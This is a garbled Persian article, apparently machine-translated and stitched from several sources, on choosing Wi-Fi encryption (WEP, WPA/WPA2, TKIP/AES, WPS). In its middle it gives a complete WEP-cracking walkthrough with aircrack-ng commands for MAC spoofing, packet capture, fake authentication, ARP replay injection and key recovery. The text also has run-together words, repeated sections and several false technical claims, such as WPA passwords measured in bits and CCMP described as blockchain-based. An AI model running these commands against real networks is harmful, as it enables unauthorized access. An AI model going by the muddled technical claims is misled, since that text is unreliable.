• رمزگذاری شبکه Wi-Fi، کدام روش را انتخاب کنیم؟ فناوری‌های امنیتی wep (Wired Equivalent Privacy).

    برای محافظت از شبکه وای فای و تعیین رمز عبور، حتما نوع امنیت شبکه بی سیم و روش رمزگذاری را انتخاب کنید. و در این مرحلهبسیاری از مردم این سوال را دارند: کدام یک را انتخاب کنیم؟ WEP، WPA یا WPA2؟ شخصی یا سازمانی؟ AES یا TKIP؟ کدام تنظیمات امنیتی به بهترین وجه از شبکه Wi-Fi شما محافظت می کند؟ من سعی خواهم کرد در این مقاله به همه این سوالات پاسخ دهم. همه چیز را در نظر بگیرید روش های ممکناحراز هویت و رمزگذاری ببینید چه گزینه هایی امنیت وای فایشبکه ها به بهترین وجه در تنظیمات روتر تنظیم می شوند.

    توجه داشته باشید که نوع امنیت یا احراز هویت، احراز هویت شبکه، امنیت، روش احراز هویت همه یکسان هستند.

    نوع احراز هویت و رمزگذاری تنظیمات اصلی امنیتی هستند وای فای بی سیمشبکه های. من فکر می‌کنم، ابتدا باید بفهمید که آنها چه هستند، چه نسخه‌هایی وجود دارد، چه قابلیت‌هایی وجود دارد، و غیره. پس از آن، ما قبلاً متوجه خواهیم شد که چه نوع محافظت و رمزگذاری را انتخاب کنیم. من به شما مثالی از چندین روتر محبوب نشان خواهم داد.

    من به شدت توصیه می کنم یک رمز عبور تنظیم کنید و از شبکه بی سیم خود محافظت کنید. نصب حداکثر سطححفاظت. اگر شبکه را باز و بدون محافظت رها کنید، هر کسی می‌تواند به آن متصل شود. در وهله اول امن نیست. و بار اضافیدر روتر خود، سرعت اتصال و انواع مشکلات در اتصال دستگاه های مختلف کاهش می یابد.

    امنیت شبکه Wi-Fi: WEP، WPA، WPA2

    سه گزینه حفاظتی وجود دارد. البته بدون احتساب "باز" ​​(بدون حفاظت).

    • WEP(Wired Equivalent Privacy) یک روش احراز هویت قدیمی و ناامن است. این اولین و نه چندان موفق روش حفاظت است. مهاجمان می توانند به راحتی به شبکه های بی سیمی که با استفاده از WEP محافظت می شوند دسترسی پیدا کنند. شما نیازی به تنظیم این حالت در تنظیمات روتر خود ندارید، اگرچه در آنجا وجود دارد (نه همیشه).
    • WPA(دسترسی محافظت شده از Wi-Fi) - قابل اعتماد و نوع مدرنامنیت. حداکثر سازگاری با تمام دستگاه ها و سیستم عامل ها.
    • WPA2یک نسخه جدید، بهبود یافته و قابل اعتمادتر از WPA است. پشتیبانی از رمزگذاری AES CCMP وجود دارد. بر این لحظه، این بهترین راه محافظت از وای فایشبکه های. این چیزی است که من استفاده از آن را توصیه می کنم.

    WPA/WPA2 می تواند دو نوع باشد:

    • WPA/WPA2 - شخصی (PSK)- این روش معمولاحراز هویت. زمانی که فقط نیاز به تنظیم رمز عبور (کلید) دارید و سپس از آن برای اتصال به شبکه Wi-Fi استفاده می کنید. یک رمز عبور برای همه دستگاه ها استفاده می شود. رمز عبور خود در دستگاه ها ذخیره می شود. جایی که می توان آن را مشاهده کرد یا در صورت لزوم تغییر داد. پیشنهاد می شود از این گزینه استفاده کنید.
    • WPA/WPA2-Enterprise- یک روش پیچیده تر، که عمدتا برای محافظت از شبکه های بی سیم در ادارات و موسسات مختلف استفاده می شود. بیشتر اجازه می دهد سطح بالاحفاظت. فقط زمانی استفاده می شود که یک سرور RADIUS برای مجوز دستگاه نصب شده باشد (که رمز عبور می دهد).

    فکر می کنم روش احراز هویت را فهمیدیم. بهترین کار استفاده از WPA2 - Personal (PSK) است. برای سازگاری بهتر، به طوری که در اتصال دستگاه های قدیمی مشکلی وجود ندارد، می توانید حالت ترکیبی WPA/WPA2 را تنظیم کنید. بسیاری از روترها این روش را به صورت پیش فرض تنظیم کرده اند. یا به عنوان "توصیه شده" علامت گذاری شده است.

    رمزگذاری بی سیم

    دو راه وجود دارد TKIPو AES.

    AES توصیه می شود. اگر دستگاه‌های قدیمی در شبکه دارید که از رمزگذاری AES (اما فقط TKIP) پشتیبانی نمی‌کنند و در اتصال به شبکه بی‌سیم مشکل دارند، «Auto» را تنظیم کنید. تایپ کنید رمزگذاری TKIPدر حالت 802.11n پشتیبانی نمی شود.

    در هر صورت، اگر به شدت WPA2 - Personal را نصب کنید (توصیه می شود)، فقط رمزگذاری AES در دسترس خواهد بود.

    چه محافظتی روی روتر وای فای قرار دهیم؟

    استفاده کنید WPA2 - شخصی با رمزگذاری AES. تا به امروز، این بهترین و بهترین است راه امن. تنظیمات امنیتی بی سیم در روترهای ایسوس به این صورت است:

    و اینگونه تنظیمات امنیتی در روترهای TP-Link به نظر می رسد (با سیستم عامل قدیمی).

    بیشتر دستورالعمل های دقیقبرای TP-Link می توانید ببینید.

    دستورالعمل برای روترهای دیگر:

    اگر نمی دانید کجا می توانید تمام این تنظیمات را در روتر خود پیدا کنید، در نظرات بنویسید، سعی می کنم پیشنهاد کنم. فقط فراموش نکنید که مدل را مشخص کنید.

    از WPA2 - دستگاه های قدیمی تر شخصی (AES) آداپتور وای فای s، تلفن ها، تبلت ها و غیره) ممکن است پشتیبانی نشوند، لطفاً در صورت داشتن مشکل در اتصال، از حالت ترکیبی (خودکار) استفاده کنید.

    اغلب متوجه می شوم که پس از تغییر رمز عبور یا سایر تنظیمات امنیتی، دستگاه ها نمی خواهند به شبکه متصل شوند. رایانه ها ممکن است خطای "تنظیمات شبکه ذخیره شده در این رایانه با الزامات این شبکه مطابقت ندارند" دریافت کنند. سعی کنید شبکه موجود در دستگاه را حذف کنید (فراموش کنید) و دوباره وصل شوید. نحوه انجام این کار در ویندوز 7 را نوشتم. و در ویندوز 10 شما نیاز دارید.

    رمز عبور (کلید) WPA PSK

    هر نوع روش امنیتی و رمزگذاری را انتخاب کنید، باید رمز عبور تعیین کنید. همچنین یک کلید WPA، رمز عبور بی سیم، کلید امنیتی شبکه Wi-Fi و غیره است.

    طول رمز عبور از 8 تا 32 کاراکتر است. می توان از حروف و اعداد لاتین استفاده کرد. همچنین کاراکترهای ویژه: - @ $ # ! و غیره بدون فاصله! رمز عبور حساس به حروف کوچک است! این بدان معنی است که "ز" و "ز" کاراکترهای متفاوتی هستند.

    من گذاشتن را توصیه نمی کنم رمزهای عبور ساده. بهتر ایجاد کنید رمز عبور قوی، که هیچ کس نمی تواند مطمئناً آن را انتخاب کند ، حتی اگر سخت تلاش کند.

    بعید است که بتوانید چنین رمز عبور پیچیده ای را به خاطر بسپارید. خوب است که آن را در جایی یادداشت کنیم. فراموش شدن رمز عبور وای فای غیر معمول نیست. در چنین شرایطی چه باید کرد، در مقاله نوشتم:.

    اگر حتی به امنیت بیشتری نیاز دارید، می توانید از اتصال آدرس MAC استفاده کنید. درست است، من نیازی به این کار نمی بینم. WPA2 - شخصی با AES و رمز عبور پیچیده- به اندازه کافی

    چگونه شبکه وای فای خود را ایمن می کنید؟ در نظرات بنویسید. خب سوال بپرس 🙂

    چگونه وای فای را هک کنیم؟ بسیاری از ما این را هنگام نصب شنیده ایم نقاط اتصال وای فایتحت هیچ شرایطی رمزگذاری WEP را انتخاب نکنید زیرا شکستن آن بسیار آسان است. احتمالاً فقط تعداد کمی سعی کرده‌اند این کار را به تنهایی انجام دهند و تقریباً همین تعداد می‌دانند که واقعاً همه اینها چگونه به نظر می‌رسد. در زیر نوعی از هک کردن یک نقطه با چنین پروتکل رمزگذاری آورده شده است، تا بتوانید با وضوح بیشتری متوجه شوید که وقتی شخصی به نقطه فوق‌العاده مخفی شما وصل می‌شود، چقدر واقعی است و چنین هکی به چه معناست. به طور طبیعی، به هیچ وجه امکان استفاده از آن در روتر شخص دیگری وجود ندارد. این مطالب فقط برای مقاصد اطلاعاتی است و خواستار کنار گذاشتن پروتکل های رمزگذاری به راحتی شکسته شده است.

    برای هک کردن، مهاجم به موارد زیر نیاز دارد:

    • آداپتور Wi-Fi مناسب با قابلیت تزریق بسته (به عنوان مثال Alfa AWUS036H)
    • بک ترک سی دی زنده
    • در واقع نقطه نظر شما دسترسی به وای فایبا رمزگذاری WEP، که آزمایش روی آن تنظیم خواهد شد
    • صبر

    پس از راه اندازی خط فرمان BackTrack به نام Konsole باید دستور زیر را وارد کنید:

    خودت را خواهی دید رابط شبکه، که "ra0" یا چیزی شبیه به آن نامیده می شود. این نام را به خاطر بسپار در آینده از آن به عنوان (رابط) یاد می شود و شما آن را با نام خود جایگزین می کنید. بعد، 4 خط را به ترتیب وارد کنید:

    airmon-ng stop (رابط)
    ifconfig (رابط) پایین
    macchanger --mac 00:11:22:33:44:55 (رابط)
    airmon-ng start (رابط)

    الان تقلبی داریم آدرس مک. وارد:

    airodump-ng (رابط)

    لیستی از شبکه های بی سیم موجود ظاهر می شود. به محض اینکه در لیست ظاهر شد شبکه مورد نظر، می توانید Ctrl+C را فشار دهید تا جستجو متوقف شود. شما باید BSSID شبکه را کپی کنید و کانال (ستون CH) را به خاطر بسپارید. همچنین مطمئن شوید که WEP در ستون ENC ذکر شده است.

    اکنون شروع به جمع آوری اطلاعات از این شبکه می کنیم:

    airodump-ng -c (کانال) -w (نام فایل) --bssid (bssid) (رابط)

    channel کانالی از ستون CH است، نام فایل نام فایلی است که همه چیز در آن نوشته می شود و bssid شناسه شبکه است.

    چیزی شبیه به آنچه در اسکرین شات نشان داده شده است خواهید دید. این پنجره را همانطور که هست رها کنید. یک پنجره کنسول جدید باز کنید و تایپ کنید:

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (رابط)

    اسید- نام SSIDشبکه های قربانی

    منتظر پیام "انجمن موفق" هستیم.

    aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (رابط)

    اکنون باید تمام صبر خود را نشان دهید و صبر کنید تا عدد موجود در ستون #Data از علامت 10000 عبور کند.

    وقتی به مقدار مورد نیاز داده های جمع آوری شده رسید، پنجره سوم Konsole را باز کرده و وارد کنید:

    aircrack-ng -b (bssid) (نام فایل-01.cap)

    نامی که قبلا برای فایل انتخاب کرده اید به عنوان نام وارد می شود.

    در صورت موفقیت آمیز بودن، خط "KEY FOUND" را مشاهده خواهید کرد که حاوی کلید شبکه است.

    اغلب این سوال مطرح می شود: چه نوع رمزگذاری Wi-Fi برای روتر خانگی انتخاب شود. این یک چیز کوچک به نظر می رسد، اما با پارامترهای نادرست، برای شبکه، و حتی با انتقال اطلاعات از طریق کابل اترنت، ممکن است مشکلاتی ایجاد شود.

    بنابراین، در اینجا ما در نظر خواهیم گرفت که چه نوع رمزگذاری داده ها پشتیبانی می شود. وای فای مدرنروترها، و تفاوت نوع رمزگذاری aes با wpa و wpa2 محبوب.

    نوع رمزگذاری شبکه بی سیم: چگونه یک روش حفاظتی را انتخاب کنیم؟

    بنابراین، در کل 3 نوع رمزگذاری وجود دارد:

    1. 1. رمزگذاری WEP

    نوع رمزگذاری WEP در دهه 90 دور ظاهر شد و اولین گزینه برای محافظت از شبکه های Wi-Fi بود: به عنوان آنالوگ رمزگذاری در شبکه های سیمیو از رمز RC4 استفاده کرد. سه الگوریتم رمزگذاری داده رایج وجود داشت - Neesus، Apple و MD5 - اما هر کدام از آنها سطح امنیتی لازم را ارائه نمی کردند. در سال 2004، IEEE استاندارد را منسوخ اعلام کرد زیرا در نهایت امنیت اتصال به شبکه را متوقف کرد. در حال حاضر، این نوع رمزگذاری برای وای فای توصیه نمی شود، زیرا. از نظر رمزنگاری امن نیست.

    1. 2.WPSاستانداردی است که نیازی به استفاده از . برای اتصال به روتر کافیست روی دکمه مناسب که در مقاله به تفصیل توضیح دادیم کلیک کنید.

    از نظر تئوری، WPS به شما امکان می دهد با استفاده از یک کد هشت رقمی به یک نقطه دسترسی متصل شوید، اما در عمل فقط چهار عدد کافی است.

    این واقعیت بی سر و صدا توسط هکرهای متعددی استفاده می شود که به سرعت (در 3 تا 15 ساعت) هک می کنند. شبکه های وای فای، پس استفاده کنید این ترکیبهمچنین توصیه نمی شود.

    1. 3.نوع رمزگذاری WPA/WPA2

    همه چیز با رمزگذاری WPA بسیار بهتر است. به جای رمز RC4 آسیب پذیر، از رمزگذاری AES در اینجا استفاده می شود، جایی که طول رمز عبور یک مقدار دلخواه است (8 تا 63 بیت). این نوعرمزگذاری یک سطح عادی از امنیت را فراهم می کند و برای ساده کاملاً مناسب است روترهای وای فای. در این مورد، دو گونه از آن وجود دارد:

    نوع PSK (کلید از پیش به اشتراک گذاشته شده) - اتصال به نقطه دسترسی با استفاده از یک رمز عبور از پیش تعریف شده انجام می شود.
    - Enterprise - رمز عبور برای هر گره به طور خودکار با تأیید در سرورهای RADIUS ایجاد می شود.

    نوع رمزگذاری WPA2 توسعه WPA با پیشرفت های امنیتی است. این پروتکل از RSN استفاده می کند که مبتنی بر رمزگذاری AES است.

    مانند رمزگذاری WPA، نوع WPA2 دارای دو حالت عملکرد است: PSK و Enterprise.

    از سال 2006، نوع رمزگذاری WPA2 توسط همه پشتیبانی شده است تجهیزات وای فای، جغرافیای مربوطه را می توان برای هر روتر انتخاب کرد.

    مزایای رمزگذاری WPA2 نسبت به WPA:

    کلیدهای رمزگذاری در طول اتصال به روتر (به جای کلیدهای استاتیک) تولید می شوند.
    - استفاده از الگوریتم مایکل برای کنترل یکپارچگی پیام های ارسالی
    - استفاده از یک بردار اولیه با طول قابل توجهی بیشتر.
    علاوه بر این، نوع رمزگذاری Wi-Fi باید بسته به محل استفاده از روتر شما انتخاب شود:

    رمزگذاری WEP، TKIP و CKIP به هیچ وجه نباید استفاده شود.

    برای نقطه خانهدسترسی کاملا مناسب WPA / WPA2 PSK است.

    برای ارزش انتخاب WPA / WPA2 Enterprise.

    یک شبکه Wi-Fi بی سیم نه تنها یک اتصال راحت دستگاه به اینترنت است، بلکه یک خطر است. اغلب، مهاجمان از Wi-Fi برای آلوده کردن رایانه به ویروس استفاده می کنند. بنابراین، برای به حداقل رساندن خطرات عفونت رایانه شخصی، ساختار قابل اعتمادی از پروتکل های مختلف استفاده می شود. امنیت بی سیم. آنها هستند که مانع می شوند دسترسی غیرمجازبه رایانه ها با رمزگذاری داده های ارسالی. این پروتکل ها امروز مورد بحث قرار خواهند گرفت.

    WEP یا Wired Equivalent Privacy چیست؟

    بیشترین امتیاز دسترسی بی سیماین گزینه را دارید که یکی از سه استاندارد رمزگذاری بی سیم را فعال کنید. این:

    • حریم خصوصی WEP یا Wired Equivalent.
    • WPA2.

    اولین پروتکل WEP یا Wired Equivalent Privacy از رمزگذاری 64 بیتی (ضعیف) سرچشمه می گیرد و در نهایت به رمزگذاری 256 بیتی (قوی) رسید.

    امروزه محبوب ترین پیاده سازی این پروتکلدر روترها رمزگذاری 128 بیتی یا بهتر به عنوان متوسط ​​شناخته می شود.

    دو نوع WEP وجود دارد:

    • WEP-40;
    • WEP-104.

    تفاوت آنها فقط در طول کلید است.

    اصل عملکرد چنین پروتکلی به وضوح در تصویر نشان داده شده است.

    در حال حاضر این تکنولوژیمنسوخ شده است کلاهبرداران می توانند چنین پروتکل امنیتی را در چند دقیقه هک کنند.

    WPA یا Wi-Fi Protected Access چیست؟

    به منظور رهایی از کاستی های WEP، استاندارد امنیتی جدید WPA توسعه یافته است. از پروتکل یکپارچگی TKIP (Temporal Key Integrity) استفاده می کرد که با WEP که از CRC یا Cyclic Redundancy Check استفاده می کرد، متفاوت بود.

    اعتقاد بر این بود که TKIP بسیار قوی تر از CRC است، زیرا استفاده از آن انتقال هر بسته داده را با یک کلید رمزگذاری منحصر به فرد تضمین می کند. ترکیب کلید دشواری رمزگشایی کلیدها را افزایش داد و در نتیجه تعداد نفوذهای خارجی را کاهش داد.

    با این حال، مانند WEP، پروتکل WPA نیز دارای اشکالاتی بود و به زودی بهبود یافت، به نام WPA 2.

    تفاوت پروتکل WPA2

    پروتکل WPA 2 امن ترین پروتکل محسوب می شود. تفاوت بین WPA و WPA2 استفاده اجباری است الگوریتم های AES(Advanced Encryption Standard) و معرفی CCMP (Counter Cipher Mode) با پروتکل کد احراز هویت بلاک چین به عنوان جایگزینی برای TKIP. حالت CCM حالت Privacy (CTR) و Chain Code Authentication (CBC-MAC) را برای احراز هویت ترکیب می کند. استفاده از این حالت ها امنیت و عملکرد خوبی را در نرم افزار یا سخت افزار فراهم می کند.

    خطرات خطرناک زیادی در ارتباط با پروتکل های بی سیم و روش های رمزگذاری وجود دارد. بنابراین، ساختار قوی پروتکل های امنیتی بی سیم مختلف برای به حداقل رساندن آنها استفاده می شود. اینها پروتکل های امنیتی بی سیمبا رمزگذاری داده های ارسال شده از طریق یک شبکه بی سیم، از دسترسی غیرمجاز به رایانه ها جلوگیری می کند.

    تفاوت بین پروتکل های WPA2، WPA، WEP Wi-Fi

    اکثر نقاط دسترسی بی سیم توانایی فعال کردن یکی از سه استاندارد رمزگذاری بی سیم را دارند:

    1. WEP (حریم خصوصی معادل سیمی)
    2. WPA2

    WEP یا Wired Equivalent Privacy

    اولین شبکه بی سیمامنیت پروتکل WEP یا Wired Equivalent Privacy بود. با رمزگذاری 64 بیتی (ضعیف) شروع شد و در نهایت به رمزگذاری 256 بیتی (قوی) رسید. محبوب ترین پیاده سازی در روترها هنوز رمزگذاری 128 بیتی (متوسط) است. این در نظر گرفته شد راه حل ممکنتا اینکه محققان امنیتی چندین آسیب‌پذیری را در آن کشف کردند که به هکرها اجازه می‌دهد کلید WEP را در عرض چند دقیقه بشکنند. او استفاده کرد CRCیا بررسی افزونگی چرخه ای.

    WPA یا Wi-Fi Protected Access

    برای رفع کاستی های WEP، WPA به عنوان یک استاندارد امنیتی جدید برای پروتکل های بی سیم توسعه داده شد. برای اطمینان از یکپارچگی پیام، او استفاده کرد پروتکل یکپارچگیTKIPیا یکپارچگی کلید زمانی. این به نوعی با WEP متفاوت بود که از CRC یا Cyclic Redundancy Check استفاده می کرد. تصور می شد که TKIP بسیار قوی تر از CRC است. استفاده از آن تضمین می کند که هر بسته داده با یک کلید رمزگذاری منحصر به فرد منتقل می شود. ترکیب کلید دشواری رمزگشایی کلیدها را افزایش داد و در نتیجه تعداد نفوذهای خارجی را کاهش داد. با این حال، مانند WEP، WPA نیز یک اشکال داشت. بنابراین WPA در WPA 2 گسترش یافته است.

    WPA2

    WPA 2 در حال حاضر به عنوان امن ترین پروتکل شناخته شده است. یکی از مهمترین تغییرات مهمقابل مشاهده بین WPA و WPA2 است استفاده اجباریالگوریتم ها AES (استاندارد رمزگذاری پیشرفته) و مقدمه CCMP (حالت رمز شمارنده با پروتکل کد احراز هویت بلاک چین)به عنوان جایگزینی برای TKIP. حالت CCM حالت Privacy (CTR) و Chain Code Authentication (CBC-MAC) را برای احراز هویت ترکیب می کند. این حالت‌ها به‌طور گسترده مورد مطالعه قرار گرفته‌اند و ثابت شده‌اند که ویژگی‌های رمزنگاری به خوبی درک شده‌اند که امنیت و عملکرد خوبی را در نرم‌افزار یا سخت‌افزار امروزی فراهم می‌کنند.